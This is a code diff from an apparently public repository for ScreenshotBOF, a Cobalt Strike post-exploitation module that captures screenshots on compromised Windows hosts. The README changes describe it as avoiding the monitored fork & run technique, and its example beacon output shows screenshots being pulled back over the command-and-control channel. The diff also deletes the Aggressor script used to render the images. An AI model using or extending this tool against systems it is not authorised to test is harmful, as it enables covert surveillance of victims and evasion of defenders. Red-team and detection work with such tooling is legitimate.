CodeXTF2
diff --git a/‎README.md‎
Lines changed: 22 additions & 18 deletions b/‎README.md‎
Lines changed: 22 additions & 18 deletions
diff --git a/‎ScreenshotBOF/ScreenshotBOF.x64.obj‎
595 Bytes b/‎ScreenshotBOF/ScreenshotBOF.x64.obj‎
595 Bytes
diff --git a/‎ScreenshotBOF/ScreenshotBOF.x86.obj‎
422 Bytes b/‎ScreenshotBOF/ScreenshotBOF.x86.obj‎
422 Bytes
diff --git a/‎ScreenshotBOF/screenshotBOF.cna‎
Lines changed: 2 additions & 165 deletions b/‎ScreenshotBOF/screenshotBOF.cna‎
Lines changed: 2 additions & 165 deletions
diff --git a/‎beacon.h‎
Lines changed: 1 addition & 0 deletions b/‎beacon.h‎
Lines changed: 1 addition & 0 deletions
@@ -2,38 +2,42 @@
 
 An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot downloaded in memory.
 
+# Release 2.0
+- JPEG is used in place of BMP
+- Moved to mingw
+- Added beacon screenshot callback option
+- Removed BMP renderer (it will be missed)
+- No longer requires Cobalt Strike 4.10
+- Supports capturing of minimized windows
+
 ## Self Compilation
 1. git clone the repo
-2. open the solution in Visual Studio
-3. Build project BOF
+2. run `make`
 
 ## Save methods:  
 0. drop file to disk
 1. download file over beacon (Cobalt Strike only)
+2. download file over beacon as a screenshot (Cobalt Strike only)
+
+## PID
+0: capture full screen (PID = 0)
+specific PID: capture specific PID (works even when minimized!)
 
 ## Usage
 1. import the screenshotBOF.cna script into Cobalt Strike
-2. use the command screenshot_bof {local filename} {save method 0/1}
+2. use the command screenshot_bof {local filename} {save method 0/1/2} {pid/0}
 
 ```
-beacon> screenshot_bof sad.bmp 1
+beacon> screenshot_bof file.jpg 2 21964
 [*] Running screenshot BOF by (@codex_tf2)
-[+] host called home, sent: 5267 bytes
+[+] host called home, sent: 12421 bytes
 [+] received output:
-[*] Screen saved to bitmap
+Downloading JPEG over beacon as a screenshot with filename file.jpg
+[*] received screenshot of Screenshot from Admin (26kb)
 [+] received output:
-[*] Downloading bitmap over beacon with filename sad.bmp
-[*] started download of sad.bmp
+Screenshot saved/downloaded successfully
 ```
 
-3. if downloaded over beacon, BMP can be viewed in Cobalt Strike by right clicking the download and clicking "Render BMP" (credit @BinaryFaultline)  
-  
-![image](https://user-images.githubusercontent.com/29991665/199232459-0601e5d8-d534-4f05-bde4-c8acf3bd3c12.png)
-  
-![image](https://user-images.githubusercontent.com/29991665/199233465-8159cec4-90a4-4d82-beff-b012753b3559.png)
-
-
-
 
 ## Notes
 - no evasion is performed, which should be fine since the WinAPIs used are not malicious
@@ -42,10 +46,10 @@ beacon> screenshot_bof sad.bmp 1
 Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability.
 
 ## Credits
-- Made using https://github.com/securifybv/Visual-Studio-BOF-template
 - Save BMP to file from https://stackoverflow.com/a/60667564
 - in memory download from https://github.com/anthemtotheego/CredBandit
-- @BinaryFaultline for BMP rendering in aggressorscript, and screenshot callback branch
+- @BinaryFaultline for (deprecated) BMP rendering in aggressorscript, and screenshot callback function
+- bitmap to jpeg from https://github.com/WKL-Sec/HiddenDesktop
 
 ## Disclaimer
 usual disclaimer here, I am not responsible for any crimes against humanity you may commit or nuclear war you may cause using this piece of poorly written code.
@@ -1,171 +1,9 @@
-import javax.imageio.ImageIO;
-import java.awt.*;
-import javax.swing.JLabel;
-import javax.swing.ImageIcon;
-import java.io.ByteArrayInputStream;
-
-# This function takes in a screenshot and creates a JLabel to display the screenshot
-sub display_image {
-	local('$screenshot $screenshot_bytes $bid $user $computer $client $MAX_IMAGE_WIDTH $MAX_IMAGE_HEIGHT $bias $image $width $height $icon $scaledIcon $component $tab_name');
-	$screenshot = $1;
-	$screenshot_bytes = $screenshot['data'];
-	$bid = $screenshot['bid'];
-	$user = $screenshot['user'];
-	$computer = beacon_info($bid, 'computer');
-
-	$client = getAggressorClient();
-	$MAX_IMAGE_WIDTH = [[[$client getTabManager] getTabbedPane] getWidth];
-	$MAX_IMAGE_HEIGHT = [[[$client getTabManager] getTabbedPane] getHeight];
-
-	$bais = [new ByteArrayInputStream: $screenshot_bytes];
-	$image = [ImageIO read: $bais];
-
-	$width = [$image getWidth];
-	$height = [$image getHeight];
-
-	$icon = [new ImageIcon: $image];
-	if ($width > $MAX_IMAGE_WIDTH) {
-		$width = $MAX_IMAGE_WIDTH;
-	}
-	if ($height > $MAX_IMAGE_HEIGHT) {
-		$height = $MAX_IMAGE_HEIGHT;
-	}
-	$scaledIcon = [new ImageIcon: [$image getScaledInstance: $width, $height, 4]];
-
-	$component = [new JLabel: $scaledIcon];
-	$tab_name = "ScreenshotBOF - $user\@$computer";
-	addTab($tab_name, $component, "...");
-
-}
-
-# This function takes in a screenshot and creates a JLabel to display the screenshot
-sub display_downloaded {
-	local('$screenshot $screenshot_bytes $bid $user $computer $client $MAX_IMAGE_WIDTH $MAX_IMAGE_HEIGHT $bias $image $width $height $icon $scaledIcon $component $tab_name');
-
-	$screenshot_bytes = $1;
-    $file_name = $2;
-
-	$client = getAggressorClient();
-	$MAX_IMAGE_WIDTH = [[[$client getTabManager] getTabbedPane] getWidth];
-	$MAX_IMAGE_HEIGHT = [[[$client getTabManager] getTabbedPane] getHeight];
-
-	$bais = [new ByteArrayInputStream: $screenshot_bytes];
-	$image = [ImageIO read: $bais];
-
-	$width = [$image getWidth];
-	$height = [$image getHeight];
-
-	$icon = [new ImageIcon: $image];
-	if ($width > $MAX_IMAGE_WIDTH) {
-		$width = $MAX_IMAGE_WIDTH;
-	}
-	if ($height > $MAX_IMAGE_HEIGHT) {
-		$height = $MAX_IMAGE_HEIGHT;
-	}
-	$scaledIcon = [new ImageIcon: [$image getScaledInstance: $width, $height, 4]];
-
-	$component = [new JLabel: $scaledIcon];
-	$tab_name = "ScreenshotBOF - $file_name";
-	addTab($tab_name, $component, "...");
-
-}
-
-# Checks the screenshot when it comes in to see if it is a BMP, then if so, renders it in a new tab
-on screenshots {
-	local('$screenshot $data');
-
-	$screenshot = $1;
-	$data = $screenshot['data'];
-
-	# Check the magic header of the data to see if it's a BMP
-	if (charAt($data, 0) eq "B" && charAt($data, 1) eq "M") {
-		display_image($screenshot);
-	}
-}
-
-popup_clear("downloads");
-popup downloads {
-	# do nothing if nothing is selected
-	if (size($1) == 0) {
-		return;
-	}
-
-	item "Interact" {
-		openOrActivate($1[0]["bid"]);
-	}
-
-	menu "&Color" {
-		local('$ids');
-		$ids = map({ return $1["id"]; }, $1);
-		insert_component(colorPanel("accents", $ids));
-	}
-    
-    item "Render &BMP" {
-        local('$download $lpath $name $count');
-   foreach $count => $download ($1) {
-      ($lpath, $name) = values($download, @("lpath", "name"));
-   
-      sync_download($lpath, script_resource("file $+ .$count"), lambda({ 
-         $handle = openf($1);
-         $data = readb($handle, -1);
-         closef($handle);
-         #println(charAt($data, 0));
-         #println(charAt($data, 1));
-         if (charAt($data, 0) eq "B" && charAt($data, 1) eq "M") {
-		    display_downloaded($data, $1);
-	     } else {
-            show_error("File is not a Bitmap image");
-         }
-         deleteFile($1);
-      }, \$name));
-   }
-    }
-}
-
-popup_clear("screenshots");
-popup screenshots {
-	item "&Interact" {
-		openOrActivate($1["bid"]);
-	}
-
-	menu "&Color" {
-		insert_component(colorPanel("accents", $1["id"]));
-	}
-
-	item "&Save" {
-		prompt_file_save($1["id"] . ".jpg", lambda({
-			local('$handle');
-			$handle = openf("> $+ $1");
-			writeb($handle, $data);
-			closef($handle);
-
-			show_message("Screenshot saved.");
-		}, $data => $1["object"]["data"]));
-	}
-
-	separator();
-
-	item "&Remove" {
-		redactobject($1["id"]);
-	}
-
-	item "Render &BMP" {
-        $data = $1["object"]['data'];
-
-	    # Check the magic header of the data to see if it's a BMP
-	    if (charAt($data, 0) eq "B" && charAt($data, 1) eq "M") {
-		    display_image($1["object"]);
-	    } else {
-            show_error("Image is not a Bitmap. It should render in Screenshots tab.");
-        }
-	}
-}
 
 #Register command
 beacon_command_register(
     "screenshot_bof",
     "Alternative screenshot capability that does not do fork n run",
-    "Use: screenshot_bof [filename] [save method]\nSave methods:\n\t0: drop file to disk\n\t1: download over beacon\n\nTake a screenshot inline using a BOF. Screenshot is saved as BMP on disk or downloaded over beacon."
+    "Use: screenshot_bof [filename] [save method]\nSave methods:\n\t0: drop file to disk\n\t1: download over beacon as a file\n\t2: download over beacon as a screenshot\n\nTake a screenshot inline using a BOF. Screenshot is saved as JPEG on disk or downloaded over beacon."
 );
 
 alias screenshot_bof {
@@ -175,7 +13,7 @@ alias screenshot_bof {
     $barch  = barch($bid);
     if (size(@_) != 4)
     {
-        berror($1, "Syntax: screenshot_bof [filename] [save method 0/1] e.g. screenshot_bof file.bmp 1 1234\nNote: set PID to 0 to capture full screen.");
+        berror($1, "Syntax: screenshot_bof [filename] [save method 0/1/2] e.g. screenshot_bof file.JPEG 1 1234\nNote: set PID to 0 to capture full screen.");
                 return;
     }
     # read in the right BOF file
@@ -196,4 +34,3 @@ alias screenshot_bof {
     # execute it.
     beacon_inline_execute($bid, $data, "go", $args);
 }
-
@@ -47,6 +47,7 @@ DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
 #define CALLBACK_FILE		 0x02
 #define CALLBACK_FILE_WRITE  0x08
 #define CALLBACK_FILE_CLOSE  0x09
+#define CALLBACK_SCREENSHOT  0x03
 
 DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
 DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);